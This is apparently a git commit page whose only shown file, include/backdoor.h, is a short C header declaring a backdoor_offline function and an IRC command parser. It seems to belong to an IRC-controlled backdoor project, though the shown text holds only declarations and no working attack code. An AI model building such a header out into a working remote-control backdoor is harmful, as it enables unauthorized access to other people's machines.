first
This commit is contained in:
commit
c174752597
8 changed files with 487 additions and 0 deletions
10
include/backdoor.h
Normal file
10
include/backdoor.h
Normal file
|
@ -0,0 +1,10 @@
|
|||
#ifndef _BACKDOOR_H
|
||||
#define _BACKDOOR_H
|
||||
#include "irc.h"
|
||||
|
||||
#define COMMON_BUF_SIZE 200
|
||||
|
||||
void backdoor_offline(void);
|
||||
void parse_cmd(IRCC_client *client);
|
||||
|
||||
#endif
|
Loading…
Add table
Add a link
Reference in a new issue